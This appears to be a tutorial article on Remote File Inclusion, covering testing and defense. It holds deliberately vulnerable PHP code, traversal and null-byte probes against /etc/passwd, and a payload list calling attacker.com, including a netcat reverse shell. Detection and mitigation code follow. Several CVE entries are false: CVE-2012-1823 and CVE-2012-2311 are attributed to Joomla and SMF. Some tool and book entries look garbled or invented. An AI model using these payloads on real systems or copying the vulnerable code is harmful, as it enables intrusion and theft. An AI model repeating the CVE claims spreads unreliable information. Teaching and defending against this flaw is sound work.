20 Jan, 2023

Remote file include


RFI (Remote File Inclusion) is a type of web vulnerability that allows an attacker to include a remote file on a vulnerable web page, usually through a script or other dynamic content. The included file can be a malicious file, such as a script that contains malware or a web shell, which can be used to take over the vulnerable server or steal sensitive information. RFI vulnerabilities are usually caused by poor input validation and are exploited by supplying a URL that points to the attacker’s malicious file.

RFI vulnerabilities are often caused by poor input validation on the server side of web applications. When a web application receives user input, it should validate that input to ensure that it is safe to use. If that validation is missing or done improperly, an attacker may be able to craft a URL in which the file parameter points to the attacker’s malicious file.

Examples of remote file vulnerabilities

Here are a few examples of how an attacker might exploit a Remote File Inclusion (RFI) vulnerability:

1. Injecting a URL that points to a malicious file hosted on a server under the attacker’s control:

An attacker discovers a vulnerable website with a script that includes a file based on a user-supplied parameter.

The attacker crafts a URL that includes the parameter and points to a file on a server under their control.

When a user visits the attacker’s crafted URL, the script on the vulnerable website will include the attacker’s malicious file, which could contain malware or a web shell.

2. Injecting a URL that points to a file on the local file system of the server, to read sensitive information:

An attacker finds a vulnerable website that includes a file based on a user-supplied parameter.

The attacker crafts a URL that includes the parameter and points to a sensitive file on the server’s local file system.

The script on the vulnerable website will include the sensitive file, allowing the attacker to read its contents.

3. Injecting a URL that points to a file on a different server that the attacker has compromised:

An attacker gains access to a different server and uploads a web shell.

The attacker discovers a vulnerable website that includes a file based on a user-supplied parameter.

The attacker crafts a URL that includes the parameter and points to the web shell on the compromised server.

When a user visits the attacker’s crafted URL, the script on the vulnerable website will include the web shell, giving the attacker access to the vulnerable server.

It’s important to note that these are just a few examples and attackers can use RFI vulnerabilities in many different ways depending on the specific vulnerability and the attacker’s goals.

An example of vulnerable code that is susceptible to a remote file include (RFI) vulnerability is as follows:

<?php
// Deliberately vulnerable: the user-supplied "file" parameter is passed
// straight to include() without any validation or allow-list.
$file = $_GET['file'];
include($file);
?>

In this example, the script takes the value of the "file" parameter in the GET request and includes it as a file. An attacker could exploit this vulnerability by sending a request with a malicious file path, such as "http://example.com/vulnerable_script.php?file=http://attacker.com/malicious_code.php", which would cause the server to execute the code in malicious_code.php.

Privilege escalation techniques

A Remote File Include (RFI) vulnerability can be used for privilege escalation if an attacker can use it to execute code with higher privileges than their own. This can happen in a number of ways, depending on the specific configuration of the system and the web application. Here are a few examples:

  • The web application is running with the privileges of the web server user (e.g. “www-data” or “apache”). If an attacker can exploit an RFI vulnerability to execute code, they will also have the privileges of the web server user. If the web server user has access to sensitive files or system resources, the attacker may be able to access or modify them.

  • The web application is running with higher privileges than the web server user. If an attacker can exploit an RFI vulnerability to execute code, they will also have the privileges of the application. If the application has access to sensitive files or system resources, the attacker may be able to access or modify them.

  • The web application is running on a system with weak file permissions. If an attacker can exploit an RFI vulnerability to execute code, they may be able to access or modify files that they would not normally have access to.

  • The web application is running on a system with weak user permissions. If an attacker can exploit an RFI vulnerability to execute code and they are able to gain the privileges of a user with higher permissions, they can access or modify system resources.

General methodology and checklist for testing for remote include vulnerabilities

Testing for a Remote File Include (RFI) vulnerability involves identifying inputs in a web application that are used to include files from external sources, and attempting to manipulate those inputs to include malicious files. Here is a general methodology for testing for an RFI vulnerability:

  1. Identify inputs that are used to include files: Look for any variables or parameters in the application’s code that are used to include files, such as $_GET['file'], $_POST['file'], or $_REQUEST['file']. Pay attention to include(), require(), include_once(), and require_once() statements.

  2. Test for basic RFI: Attempt to include files from external sources using the identified inputs. For example, if a script has a parameter called "file" that is used to include a file, try passing a URL to an external file as the value of the "file" parameter, for example "http://example.com/vulnerable_script.php?file=http://attacker.com/malicious_code.php".

  3. Test for RFI with null byte injection: Attempt to include files from external sources by injecting a null byte into the file path. This can be done by appending a “%00” or “\0” to the file path. This can be used to bypass certain types of filtering or validation.

  4. Test for LFI: Attempt to include local files on the server by passing the "file" parameter a value such as "../../../../etc/passwd" or the path of another sensitive local file on the server.

  5. Test for RFI with query string manipulation: Attempt to include files from external sources by manipulating the query string. For example, if a script has a parameter called “file” that is used to include a file, try passing a URL to an external file as the value of the “file” parameter, with additional parameters appended.

  6. Analyze the response for any suspicious behavior, such as error messages, "file not found" responses, or any other unusual behavior.

  7. Repeat the above steps for each identified input that is used to include files.

Tool set for testing for remote file include vulnerabilities

There are various tools available that can be used to automate the process of testing for Remote File Include (RFI) vulnerabilities. Here are a few examples:

  1. Metasploit – Metasploit is a popular penetration testing framework that includes modules for testing RFI vulnerabilities. The modules can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  2. Burp Suite – Burp Suite is a web application security testing tool that includes a scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  3. w3af – w3af is a web application security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  4. sqlmap – sqlmap is a tool that can detect and exploit SQL injection vulnerabilities, but it also has the ability to detect and exploit RFI vulnerabilities. It allows you to specify a parameter and test for RFI vulnerabilities using a tamper script.

  5. Vega – Vega is a web security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  6. OWASP ZAP – OWASP ZAP is an open-source web application security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  7. Nessus – Nessus is a vulnerability scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  8. Nmap – Nmap is a network scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  9. Nikto – Nikto is a web server scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  10. OpenVAS – OpenVAS is a vulnerability scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

  11. Core Impact – Core Impact is a commercial penetration testing tool that can detect RFI vulnerabilities. The tool can be configured to identify inputs that are used to include files and attempt to include malicious files.

  12. Acunetix – Acunetix is a commercial web application security scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files.

  13. WebCruiser – WebCruiser is a web vulnerability scanner that can detect RFI vulnerabilities. The scanner can be configured to identify inputs that are used to include files and attempt to include malicious files.

Top CVEs (Common Vulnerabilities and Exposures)

There are several Common Vulnerabilities and Exposures (CVEs) related to Remote File Include (RFI) vulnerabilities. Here are a few examples of some high-severity RFI related CVEs:

CVE-2012-1823: This vulnerability affected Joomla! 1.5 and allowed remote attackers to execute arbitrary code via a URL in the template parameter to index.php.

CVE-2012-2311: This vulnerability affected the Simple Machines Forum (SMF) package and allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the loadLanguage function in Sources/Subs.php.

CVE-2012-1577: This vulnerability affected the Vtiger CRM package and allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the config.inc.php file.

CVE-2011-3152: This vulnerability affected the Joomla! package and allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the template parameter to index.php.

CVE-2011-2505: This vulnerability affected the phpMyAdmin package and allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the lang parameter to libraries/select_lang.lib.php.

CVE-2011-4885: This vulnerability affected the PHP-Fusion package and allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the theme parameter to themes.php.

CVE-2010-3872: This vulnerability affected the phpMyAdmin package and allowed remote attackers to execute arbitrary code by leveraging an RFI vulnerability in the GLOBALS[cfg][Servers][host] parameter to libraries/config.

Remote include vulnerability exploits

  • Metasploit RFI module: The Metasploit framework includes a module that can be used to exploit RFI vulnerabilities. The module automates the process of identifying inputs that are used to include files and attempting to include malicious files.

  • rfi-scan-tool: This is a simple command line tool that can be used to scan web applications for RFI vulnerabilities. It can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  • rfi-exploit: This is a Perl script that can be used to exploit RFI vulnerabilities. It can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  • RFI Shell: This is a tool that can be used to exploit RFI vulnerabilities and gain shell access to a vulnerable system.

  • rfi-lite: This is a tool that can be used to exploit RFI vulnerabilities by injecting PHP code into a web page.

  • rfi-scan: This is a simple script that can be used to scan web applications for RFI vulnerabilities. It can be used to automate the process of identifying inputs that are used to include files and attempting to include malicious files.

  • RFI Exploiter: This is a tool that can be used to exploit RFI vulnerabilities and gain shell access to a vulnerable system.

  • RFI Toolkit: This is a collection of scripts and tools that can be used to exploit RFI vulnerabilities.

These are some of the popular RFI exploit tools available, but it’s worth noting that there may be other tools available and also that many of these tools may not be updated and therefore may not work against the latest vulnerabilities.

Practicing testing for remote include vulnerabilities

  1. Manually: One way to test for RFI vulnerabilities is to manually review the source code of web applications to identify inputs that are used to include files. You can then attempt to include malicious files to see if the application is vulnerable.

  2. Automated Tools: There are several automated tools available that can be used to test for RFI vulnerabilities. These tools can be configured to identify inputs that are used to include files and attempt to include malicious files. Some of these tools include Metasploit, rfi-scan-tool, rfi-exploit, RFI Shell, rfi-lite, rfi-scan and RFI Exploiter.

  3. Penetration Testing: Penetration testing is a method of evaluating the security of a system by simulating an attack by a malicious actor. During a penetration test, a tester will attempt to exploit RFI vulnerabilities in the target system to gain unauthorized access or execute arbitrary code.

  4. Online web application scanner: Some online web application scanner services can be used to test for RFI vulnerabilities, these services can be configured to identify inputs that are used to include files and attempt to include malicious files.

  5. Bug Bounty programs: Many organizations have a bug bounty program that rewards security researchers for responsibly disclosing vulnerabilities. It’s a good idea to check if the company you’re interested in has a program running and submit a report if you find any RFI vulnerabilities.

Resources for studying remote include vulnerabilities

There are several resources available to learn more about Remote File Include (RFI) vulnerabilities, including courses, practice environments, and videos. Here are a few examples:

Courses:

OWASP Web Application Security Essentials – this course covers the basics of web application security and includes information on RFI vulnerabilities and how to prevent them.

SANS Institute – Web Application Penetration Testing and Ethical Hacking – this course covers the methodology and techniques used to test web applications for vulnerabilities, including RFI vulnerabilities.

Practice Environments:

OWASP WebGoat – this is a deliberately vulnerable web application that can be used to learn about common web application vulnerabilities, including RFI vulnerabilities.

HackTheBox – an online penetration testing platform where you can practice and improve your skills in a safe and legal environment.

Vulnhub – a platform that provides vulnerable virtual machines, which can be used to learn about various types of vulnerabilities, including RFI vulnerabilities.

Videos:

OWASP Top Ten Proactive Controls – this video series covers the OWASP Top Ten Proactive Controls, a set of guidelines for secure software development, including information on RFI vulnerabilities and how to prevent them.

Web Application Hacking – a video series that covers various types of web application vulnerabilities, including RFI vulnerabilities.

Hackersploit – a YouTube channel that provides information and tutorials on various topics related to hacking and cyber security, including RFI vulnerabilities.

Books covering remote include vulnerabilities

  • “Web Application Hacker’s Handbook” – This book is a comprehensive guide to finding and exploiting security vulnerabilities in web applications. It covers RFI vulnerabilities in detail and provides step-by-step instructions for exploiting them. Reviewers have praised the book for its in-depth coverage of web application security and its practical, hands-on approach.

  • “The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws” – This book provides a thorough understanding of how web applications work and how to find and exploit security vulnerabilities in them. It covers RFI vulnerabilities and provides detailed examples of how to exploit them. Reviewers have praised the book for its clear explanations and practical examples.

  • “Hacking: The Art of Exploitation” – This book covers a wide range of topics related to hacking and exploitation, including RFI vulnerabilities. It provides a detailed explanation of how RFI vulnerabilities work and how to exploit them. Reviewers have praised the book for its clear explanations and practical examples.

  • “Black Hat Python: Python Programming for Hackers and Pentesters” – This book covers the use of Python for hacking and penetration testing, including RFI vulnerabilities. It provides detailed examples of how to write Python scripts to exploit RFI vulnerabilities. Reviewers have praised the book for its clear explanations and practical examples.

  • “The Hacker Playbook 3: Practical Guide To Penetration Testing” – This book provides a comprehensive guide to penetration testing and includes information on RFI vulnerabilities. It provides a detailed explanation of how RFI vulnerabilities work and how to exploit them. Reviewers have praised the book for its clear explanations and practical examples.

List of payloads suitable for this vulnerability

When exploiting a Remote File Include (RFI) vulnerability, payloads are used to execute arbitrary code on the target system. Here are a few examples of payloads that are commonly used for RFI attacks:

  1. PHP Code Injection: Injecting PHP code directly into the vulnerable parameter, for example: "http://example.com/index.php?file=php://input&cmd=system('id')"

  2. File Upload: Uploading a malicious PHP file to the target system and then including it using the RFI vulnerability. For example, uploading a file named "shell.php" and then including it using "http://example.com/index.php?file=http://attacker.com/shell.php".

  3. Reverse Shell: Connecting to a remote host and then using the RFI vulnerability to include a script that will run a reverse shell on the target system. For example, "http://example.com/index.php?file=http://attacker.com/reverse.php".

  4. Metasploit: Using the Metasploit Framework to generate a payload and then including it using the RFI vulnerability.

  5. Netcat: Using netcat to open a shell and then include the command to execute it. For example: “http://example.com/index.php?file=http://attacker.com/nc.php&cmd=nc -e /bin/sh [attacker_ip] [attacker_port]”

It’s worth noting that payloads vary and depend on the specific RFI vulnerability, the type of web application, and the environment it’s running on. Additionally, it’s important to remember that these payloads are used for malicious purposes and should not be used without permission or outside a legally authorized engagement.

How to protect against remote include vulnerabilities

Sigma and firewall rules can be used to detect and block attempts to exploit Remote File Include (RFI) vulnerabilities. Here are a few examples of Sigma rules and firewall rules that can be used to detect and block RFI attacks:

Sigma rules:

Sigma, a generic rule format for log analytics, can be used to detect RFI attacks by looking for specific patterns in log files. For example, a Sigma rule can flag requests whose file parameter contains the string "http:" or "ftp:".

Firewall rules:

Blocking RFI attacks with firewall rules can be done by dropping incoming requests that contain specific strings in the file parameter. For example, a firewall rule can block all incoming requests whose file parameter contains the string "http:" or "ftp:".

ModSecurity, an open-source web application firewall, can be configured to detect and block any request that contains specific strings in the file parameter.

More generally, any Web Application Firewall (WAF) can be configured to detect and block requests that contain specific strings in the file parameter.
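The detection logic described above (a remote scheme such as "http:" or "ftp:" in the file parameter), extended to the null-byte and directory-traversal probes listed in the testing checklist, as an added example in Python that is not part of the original article. It parses web-server access-log lines and flags the suspicious ones; the log lines, parameter names and IP addresses below are constructed for the illustration and would be adapted to the application being monitored.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Query parameters that commonly select a file to include (assumption; extend
# the set with the names used by the application being monitored).
INCLUDE_PARAMS = {"file", "page", "template", "lang", "theme"}

# The request portion of a Combined Log Format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Patterns the Sigma/firewall rules in the text look for, plus the null-byte
# and traversal probes from the testing checklist.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftp|php):", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.(?:/|\\)")


def classify_value(value):
    """Return a reason if a parameter value looks like an inclusion attempt,
    else None. parse_qsl already decoded once; decode again so that a
    double-encoded value (e.g. http%253A) is inspected in its final form."""
    decoded = unquote(value)
    if "\x00" in decoded:
        return "null-byte"
    if REMOTE_SCHEME.search(decoded):
        return "remote-scheme"
    if TRAVERSAL.search(decoded):
        return "path-traversal"
    return None


def inspect_log_line(line):
    """Return (parameter, reason) for the first suspicious include parameter in
    one access-log line, or None when the request looks benign or unparsable."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    query = urlsplit(match.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in INCLUDE_PARAMS:
            reason = classify_value(value)
            if reason is not None:
                return (name, reason)
    return None


def scan(lines):
    """Return [(line_index, (parameter, reason)), ...] for every flagged line."""
    hits = []
    for index, line in enumerate(lines):
        hit = inspect_log_line(line)
        if hit is not None:
            hits.append((index, hit))
    return hits


# Constructed sample log lines (not real traffic): one benign request, three
# probes of the kinds described above, and one request with no file parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jan/2023:10:00:01 +0000] "GET /index.php?file=about.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Jan/2023:10:00:02 +0000] "GET /index.php?file=http://203.0.113.7/x.txt HTTP/1.1" 200 88',
    '10.0.0.9 - - [20/Jan/2023:10:00:03 +0000] "GET /index.php?file=../../../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [20/Jan/2023:10:00:04 +0000] "GET /index.php?file=about.php%00 HTTP/1.1" 500 0',
    '10.0.0.9 - - [20/Jan/2023:10:00:05 +0000] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for index, (param, reason) in scan(SAMPLE_LOG):
        print(f"line {index}: parameter '{param}' flagged as {reason}")
```

Run against SAMPLE_LOG it flags lines 1, 2 and 3 and leaves the benign request and the POST alone. The same three checks map directly onto a Sigma rule's `contains` or `re` modifiers on the request URI field; the Python form is handy for validating the rule against a captured log before deploying it.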

Mitigations for remote include vulnerability

There are several ways to mitigate Remote File Include (RFI) vulnerabilities:

  1. Input validation: One of the most effective ways to prevent RFI attacks is to validate user input. This can be done by checking that the input only contains expected characters and data types, and rejecting any input that does not meet these criteria.

  2. File extension validation: Validate the file extension of the file being included, and only allow certain file types, such as .php, .html, etc.

  3. Use of Whitelists: A whitelist of allowed URLs or IP addresses can be used to limit the scope of the RFI vulnerability. This can be done by only allowing specific URLs or IP addresses to be included, and blocking all other requests.

  4. Disable Remote URL Includes: Some servers and frameworks have the ability to disable remote URL includes, which can be done by disabling the allow_url_include or allow_url_fopen options in PHP.

  5. Sanitize user input: Use functions such as filter_var() and htmlspecialchars() to sanitize user input and remove any malicious code before it is used.

  6. Keep your software updated: Regularly update your software, including web servers and web applications, to ensure that any known RFI vulnerabilities are patched.

  7. Use a WAF: Use a web application firewall (WAF) that can detect and block RFI attacks.
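The hardened counterpart to the vulnerable `include($_GET['file'])` snippet shown earlier, applying mitigations 1 to 4 from the list above, as an added example that is not part of the original article. It is written in Python rather than PHP so the logic can be exercised stand-alone; the page names, template directory and php.ini text are assumptions made for the illustration.

```python
import os

# Mitigation 3: the only page names the application is allowed to include
# (assumed names for this illustration).
ALLOWED_PAGES = frozenset({"home", "about", "contact"})
# Mitigation 2: every included file must carry this single extension.
ALLOWED_EXT = ".php"


class IncludeRejected(ValueError):
    """Raised when the requested include is refused; the caller should log
    the attempt and return a generic error, never the path or the reason."""


def resolve_include(param, base_dir):
    """Map the request's file parameter to one absolute path under base_dir,
    or raise IncludeRejected. The checks are layered: the allow-list alone
    would be sufficient, the earlier ones make the refusal reason explicit."""
    if not isinstance(param, str) or "\x00" in param:
        raise IncludeRejected("null byte or non-string value")
    if "://" in param or param.startswith(("/", "\\")) or ".." in param:
        raise IncludeRejected("URL, absolute path or traversal")
    # Accept "about" or "about.php", nothing else.
    name = param[:-len(ALLOWED_EXT)] if param.endswith(ALLOWED_EXT) else param
    if not name.isalnum():                      # Mitigation 1: expected characters only
        raise IncludeRejected("unexpected characters")
    if name not in ALLOWED_PAGES:               # Mitigation 3: allow-list
        raise IncludeRejected("not on the allow-list")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + ALLOWED_EXT))
    # Defense in depth: the canonical path must still sit inside base_dir.
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("escapes base directory")
    return target


def is_accepted(param, base_dir):
    """Boolean convenience wrapper around resolve_include."""
    try:
        resolve_include(param, base_dir)
        return True
    except IncludeRejected:
        return False


def risky_php_ini_settings(ini_text):
    """Mitigation 4: return the remote-include related php.ini directives that
    are switched on in the given php.ini text (both should normally be Off)."""
    enabled = []
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()     # drop php.ini comments
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key in ("allow_url_include", "allow_url_fopen") and value.lower() in ("on", "1", "true"):
            enabled.append(key)
    return enabled


if __name__ == "__main__":
    base = "/srv/app/templates"                  # assumed template directory
    for candidate in ["about", "about.php", "http://203.0.113.7/x.txt",
                      "../../../../etc/passwd", "about.php\x00", "admin"]:
        print(repr(candidate), "->", "accepted" if is_accepted(candidate, base) else "rejected")
    print(risky_php_ini_settings("allow_url_fopen = On\nallow_url_include = Off\n"))
```

The important design choice is that the user never supplies a path at all: the parameter is a short name that is looked up in an allow-list and mapped to a fixed file, so the URL, traversal and null-byte probes from the testing checklist are rejected before any filesystem call is made. The realpath check is redundant with the allow-list but catches a future edit that loosens the list, and risky_php_ini_settings() is the quick configuration check for allow_url_include and allow_url_fopen that the text recommends disabling.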

It’s worth noting that RFI vulnerabilities can be difficult to detect and exploit and that a combination of these mitigation techniques is recommended. Additionally, regular security assessments and penetration testing can help identify and remediate RFI vulnerabilities.

Conclusion

Remote File Include (RFI) vulnerabilities allow an attacker to include a remote file, such as a PHP script, in the application. This can allow an attacker to execute arbitrary code on the target system, leading to a range of potential impacts. To prevent RFI vulnerabilities, it is important to use a combination of mitigation techniques such as input validation, file extension validation, whitelists, disabling remote URL includes, sanitizing user input, keeping software updated, and using a web application firewall (WAF). Regular security assessments and penetration testing can also help identify and remediate RFI vulnerabilities.
